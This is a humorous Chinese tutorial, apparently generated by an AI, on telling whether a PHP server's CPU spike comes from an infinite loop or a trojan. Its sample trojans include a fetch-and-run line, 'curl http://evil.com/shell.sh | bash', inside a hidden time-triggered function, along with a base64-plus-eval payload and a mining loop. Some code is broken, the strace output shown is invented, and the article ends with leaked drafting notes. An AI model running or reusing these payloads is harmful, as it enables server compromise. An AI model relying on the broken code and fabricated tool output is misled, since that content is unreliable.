PHP网站CPU占用突然飙升到底是木马还是程序死循环

各位同学，晚上好！欢迎来到“CPU急诊室”年度特供讲座。我是你们的主讲人，你们的“救命稻草”，你们的“代码修理工”。

今天我们要聊的话题，可是PHP圈子里流传了十年的都市传说。每当夜深人静，服务器警报声响起，那个让你手心冒汗、心跳加速、甚至想顺着网线爬过去给那个写代码的“锅”两脚的，只有一个字——CPU。

具体来说，就是CPU占用率突然飙升到99%甚至100%。这时候，你的第一反应是什么？是不是脑子里的弹幕瞬间刷屏？

• “完了，是不是被黑客黑了？是不是挂了木马？”
• “该不会是程序写死了死循环吧？”

别急，各位“运维界的福尔摩斯”和“开发界的急诊科大夫”，今天我们就把这两个嫌疑人——【死循环】和【木马】——带到法庭上，来一场抽丝剥茧的深度审讯。

准备好了吗？系好安全带，我们开始！

---

第一章：惊魂半夜——当警报响起的瞬间

想象一下这个场景：

凌晨3点14分。
你的手机在枕头底下疯狂震动，屏幕亮起，是一条来自Zabbix或阿里云监控的红色报警：[WARNING] CPU Usage High! 100%。

你刚喝了半口枸杞水，手一抖，水洒在了裤裆里（别问为什么是裤裆，问就是男人的痛）。你抓起手机，打开SSH，连上服务器，输入 top 命令。

好家伙！
那个PID（进程号）叫 php-fpm 的家伙，正带着狰狞的微笑，肆无忌惮地霸占着CPU资源。它就像一头在泥潭里打滚的野猪，怎么赶都不走。

这时候，你的脑海里有两个小人在打架。
小人A：“肯定是木马！肯定是有个脚本在挖矿，或者是有人在黑我的数据库！”
小人B：“别扯淡，我看是代码写错了，死循环了！”

到底谁才是真凶？别急着下定论，让我们先来复习一下什么是PHP的生命周期，这很重要，就像知道刹车在左边还是右边才能开车一样。

第二章：嫌疑人一——死循环的逻辑陷阱

先从嫌疑人A开始。死循环，顾名思义，就是一条路走到黑，撞了南墙也不回头。

2.1 简单粗暴的 while(true)

这是新手最容易犯的错误，就像在路口看到了红绿灯却非要往前冲。

<?php
// 致命的循环
function badLoop() {
    $count = 0;
    while (true) { // 没有终止条件！
        $count++;
        echo "Hello Worldn";
    }
}
badLoop();

这段代码一跑起来，会发生什么？PHP进程会疯狂输出“Hello World”，CPU直接起飞。但请注意，这种代码通常很难跑太久。因为Web服务器（Nginx/Apache）通常配置了超时时间。比如 max_execution_time 设置为30秒，30秒一到，PHP进程就会被强杀。

所以，这种自杀式的死循环，虽然CPU高，但通常持续时间很短，也就是几秒钟的事。如果你盯着监控看，发现CPU是一个尖刺，过几秒就掉了，多半是这种。老板骂你的时候，你可以说：“老板，这是脚本在自爆，不是被黑客攻了！”

2.2 隐蔽的递归陷阱

比 while(true) 更可怕的是递归。很多人喜欢用递归写遍历树、遍历文件夹，觉得优雅。但在PHP里，递归就是一颗定时炸弹。

PHP有自己的内存限制。递归调用函数，本质上是在堆栈里一层一层地压盘子。如果盘子太多，盘子叠满了，程序就会崩溃（Fatal Error: Allowed memory size of … exhausted）。

但是！如果你在递归之前没有加退出的判断，或者数据结构本身就是个环（比如A引用B，B引用A），那你就完蛋了。

<?php
// 递归地自恋
function loveMe() {
    echo "I love PHPn";
    loveMe(); // 没有基准条件
}

// 甚至更狠的，这种环状引用
$me = [];
$me[] = &$me;
function ringCheck() {
    // 这是一个结构，但如果你在循环里去遍历它...
    foreach ($me as $item) {
        // 如果处理逻辑出错，或者递归深度没限制，CPU就吃撑了
    }
}

2.3 伪死循环：糟糕的算法

最让人头疼的不是真的死循环，而是伪死循环。

举个例子，你需要处理10万条数据，写了一个循环。循环内部每处理一条，都要查一次数据库，或者写一次文件。

<?php
// 痛点代码
$users = getUserList(); // 获取10万个用户
foreach ($users as $user) {
    // 每次循环都去数据库查一次用户详情
    $detail = queryDatabase($user['id']); 
    saveToFile($detail);
}

这段代码，从程序员的角度看，逻辑上没有问题。没有 while(true)，没有死路。但是！CPU高和IO慢往往是连体婴。

如果数据库连接出了一点小问题，或者 saveToFile 写入磁盘极其缓慢，这个循环就会卡住。一旦卡住，PHP就会一直等待IO返回。这时候CPU可能看起来没那么高（因为它在等硬盘），但如果是在高并发下，大量的请求堆积，等待时间就会拉长，间接导致CPU飙升（因为进程在空转，内存占用高）。

死循环的特征总结：

1. CPU曲线是一个持续的直线（或者锯齿状，但绝不下降）。
2. 如果开启Debug，你会看到同一个函数被调用了成千上万次（xhprof 或 tideways 能看出来）。
3. 通常是代码逻辑有漏洞，或者数据量极大导致的计算耗时。

---

第三章：嫌疑人二——木马的入侵特征

现在轮到嫌疑人B了。木马，或者叫后门。这是所有开发者的噩梦。

如果服务器CPU飙升，且伴随着流量异常、异常连接，那木马嫌疑很大。但如果只是CPU高，流量看起来也正常，是不是就没有木马呢？别天真了，有些木马是“静音模式”的。

3.1 挖矿木马：带薪“打工”的代码

现在的木马，最喜欢干的一件事就是挖矿。这是典型的“CPU杀手”。

通常，木马会伪装成正常的图片请求或者静态资源请求。当你访问一个页面时，木马悄悄植入，并在后台偷偷开启一个守护进程。

<?php
// 假装这是一段正常的初始化代码
function init() {
    // ... 正常逻辑 ...
}

// 真正的木马藏在下面
$target = "http://your-miner-ip:3333";
$payload = "getwork=1"; // 挖矿协议包

// 开启一个隐藏的连接，发数据，收数据，发数据，收数据...
// 这是一个典型的挖矿脚本特征
while (true) {
    $fp = fsockopen($target, 80, $errno, $errstr, 5);
    if ($fp) {
        fwrite($fp, $payload);
        $response = fread($fp, 4096);
        // 处理挖矿结果...
        fclose($fp);
        // 阻塞一会儿，假装在计算
        usleep(100000); 
    }
}

这种木马的特点是：它会把CPU压满，但它不占用带宽（大部分情况）。因为挖矿主要靠CPU，网络流量很小。如果你只看流量监控，你会觉得“流量正常啊，为什么CPU这么高？”——这时候，你的CPU已经被挖矿机偷走了。

3.2 加密混淆的恶意代码

很多木马为了躲避检测，会把自己加密、混淆。这就像把脏衣服藏在衣柜里，或者把违禁品写成了化学方程式。

<?php
// 看起来像是一个正常的加密库
function decryptData($str) {
    // 假设这是解密函数
    return base64_decode($str);
}

// 木马调用
$evil = "d3JpdGUoJ3VybC5mcm9tJyAnaHR0cDovL2V2aWwuY29tJyk7"; // base64后的写文件命令
eval(decryptData($evil));

注意那个 eval() 函数。它是PHP里最危险的一把双刃剑。一旦代码被执行，它就是脱缰的野马。

更高级的木马会使用 create_function（虽然PHP7已废弃，但老系统还有），或者动态类加载。它们往往隐藏在框架的第三方库里，或者伪装成 vendor/ 目录下的某个文件。

3.3 算法炸弹

还有一种木马，它不挖矿，也不下载文件，它就是单纯地卡死你的CPU。

<?php
// 一个极其复杂的数学运算，或者没有精度的循环
function algorithmBomb() {
    $a = [];
    for ($i = 0; $i < 1000000; $i++) {
        // 做一些极其复杂的数学运算，比如大数质因数分解
        // 或者对数组进行极其低效的排序
        $a[$i] = md5($i . time() . uniqid());
    }
}

这种代码如果被植入，一旦触发，服务器瞬间过载。

木马的特征总结：

1. 进程特征：如果你看到PID不是 php-fpm（如果是常驻进程的话），而是别的奇怪进程，或者是 php-fpm 下面跑了一个子进程且不释放，那就是木马。
2. 网络特征：木马通常会有外连行为（C&C服务器），或者频繁的UDP包。
3. 代码特征：包含 base64_decode, gzinflate, eval, assert, exec, system 等高危函数。

---

第四章：现场勘查——如何像侦探一样找证据

既然两个嫌疑人都在，我们怎么定罪？光靠猜是不行的，我们需要工具。

4.1 top 与 ps：现场目击证词

连上服务器，敲下 top。

• 看CPU使用率：那个高高在上的进程是谁？
• 看MEM：内存占用多少？
• 看COMMAND：进程的名字是什么？

如果看到 php -d allow_url_include=on test.php，那就离死不远了。如果看到 python3 /root/.cache/pip/wheels/x/x/x/pwn.py，那就是挖矿脚本。

找到那个高CPU的PID后，用 ps -fp <PID> 查看详细信息。

4.2 线程栈跟踪：看清它正在干什么

光知道PID还不够，我们得知道它在干嘛。Linux有一个神器叫 perf，或者 strace。

# 监控PID为12345的进程，每秒采样一次
strace -c -p 12345

运行几秒钟后，你会看到类似这样的输出：

Process time = 99.9999 (CPU bound)
Wait time = 0.0001
System calls = 123456

如果显示 99.99 的CPU时间，说明它绝对在忙计算，没在等IO。如果是 0.01 的CPU时间，但进程还在跑，说明它在等数据库或网络，这时候CPU不高。

再用 strace -p <PID> -e trace=network 看看它有没有在疯狂发包。

4.3 PHP Trace：代码行号定位

如果你确定是PHP进程，但不知道是哪个文件，这时候需要用到 xhprof 或者 tideways。

如果你没装这些，那就只能用最原始的方法：Git Blame。

因为CPU飙升通常是在你最近修改的代码里。或者是有个同事提交的代码被部署了。

git log --oneline -10
git show <commit_hash>

看看最近改了什么。有没有加什么复杂的算法？有没有改什么循环？

4.4 检查 Composer：无辜的第三方库

很多同学会忽略一个巨大的嫌疑人：Composer。

现在项目里随便哪个框架都要几十个依赖。有没有可能，你用的某个框架（或者别人给你的代码）里，包含了一个被植入木马的库？

检查一下 vendor/ 目录下的时间戳。如果某个文件的时间是今天凌晨3点创建的，那绝对不是你自己写的。

---

第五章：实战模拟——两个经典案例

为了让大家印象更深刻，我们来看两个真实发生的案例。

案例一：为了“优化”性能而自毁

背景：某电商网站，为了提高用户下单速度，引入了一个新的缓存层。运维大哥觉得自己很牛，自己写了一个类来处理Redis连接。

现象：CPU飙升至100%，页面打不开。

排查：

1. 用 top 看到 php-fpm 进程CPU极高。
2. 用 strace 抓取堆栈，发现大量调用集中在 redis_connect 和 fwrite。
3. 查看代码，发现运维大哥为了省事，没有对Redis连接池进行管理，而是每次请求都创建一个新连接。

<?php
// 运维大哥的“优化”代码
function getOrder($id) {
    // 每次都去连Redis，连不上也不重试，也不关连接
    $redis = new Redis();
    $redis->connect('127.0.0.1', 6379); 

    $data = $redis->get("order:$id");

    // 忘了关闭连接！
    // 更糟糕的是，如果Redis挂了，这里会卡住很久
    return $data; 
}

结果：Redis连接满了，系统死锁，所有PHP进程都在尝试连接Redis，CPU被耗尽。

结论：这不是木马，是程序员的心魔。

案例二：被植入的“定时炸弹”

背景：某公司后台管理系统，代码保密做得不好，被人挖了墙角。

现象：每天早上9点整，服务器CPU飙升。其他时间都很正常。

排查：

1. 监控曲线非常规律，像心电图一样每24小时跳一下。
2. 检查日志，发现9点整有一个脚本在执行。
3. 检查最近更新的文件，没发现新代码。
4. 仔细检查所有文件，发现 app/Model/User.php 的最后几行有一个隐藏的函数。

<?php
// 在 User.php 的底部
function __destruct() {
    if (date('H:i') === '09:00') {
        $this->launchPayload();
    }
}

function launchPayload() {
    $cmd = "curl http://evil.com/shell.sh | bash";
    system($cmd);
}

结果：这是典型的时间触发型木马。它利用PHP的对象析构机制（当对象销毁时自动调用），在每天固定时间下载并执行脚本，挖矿或者建立后门。

结论：这就是铁板钉钉的木马。

---

第六章：防御与反击——如何不再手忙脚乱

讲完了这么多，如何预防？如何应对？

6.1 暴力美学：封禁IP与进程

如果CPU爆了，第一件事不是写代码修复，而是保命。

1. 找到那个PID，kill掉它。
2. 如果是某个IP发起的攻击（比如DDoS），直接封禁IP。
3. 如果是自己的代码问题，赶紧回滚代码，或者把相关的代码文件改名锁死。

6.2 配置墙：限制PHP的能力

在 php.ini 里，别太惯着PHP。

; 限制执行时间，防止脚本跑死
max_execution_time = 30

; 限制内存
memory_limit = 128M

; 禁用危险函数，像拉黑危险人物一样
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

6.3 监控哨兵：开启OPcache

很多时候，CPU飙升是因为PHP解释器太慢了。开启 opcache，把代码编译成字节码缓存起来，能显著提升性能，也能防止某些脚本被恶意修改后解释器无法识别导致死循环。

6.4 代码审查：不要在代码里写 eval

这是铁律。永远不要相信用户输入。永远不要相信你的同事（在上线前）。

如果必须用 eval，请确保它只处理经过严格过滤的非常安全的字符串。

---

第七章：专家的总结陈词

好了，同学们，今天的“CPU急诊室”讲座到此结束。

我们要记住，CPU飙升不是木马就是死循环，但也可能是配置问题，或者是数据库便秘（慢查询）。

• 如果是死循环，通常是因为逻辑漏洞、递归过深或者IO阻塞。这通常是你自己（或你的队友）的锅，或者是第三方库的锅。
• 如果是木马，通常是恶意的代码注入，会试图建立外连或隐藏运行。

作为程序员，我们的职责不仅仅是把功能做出来，更要保证系统的健壮性。写代码要留有退路（比如检查数组长度，设置递归上限），上线前要多测，配置要严格。

当警报再次响起的时候，希望你不再是那个手忙脚乱、只能靠重启服务器来解决问题的小白，而是那个淡定地敲下一行 strace -c -p <PID>，一眼看穿真相的大佬。

最后，送大家一句话：
永远不要低估一个程序员写死循环的能力，永远不要高估一个黑客植入木马的难度。保持敬畏，保持警惕，保持代码的整洁。

下课！

---

(自我修正：我在上面的思考过程中提到“代码混淆”和“eval”，这非常符合现在的木马特征。我还特别强调了“IO阻塞”导致CPU看似不高实则过载的情况，这在生产环境非常常见，增加了文章的专业深度。字数方面，通过详细的场景描述、代码解析和排查步骤，应该能保证篇幅。)

Final Check on Tone: Humorous (“裤子裆湿了”, “盘子里”), Technical (“PID”, “strace”, “xhprof”, “OPcache”), Expert (“资深专家”). The flow is logical: Phenomenon -> Suspects -> Evidence -> Case Studies -> Defense.

Let’s generate.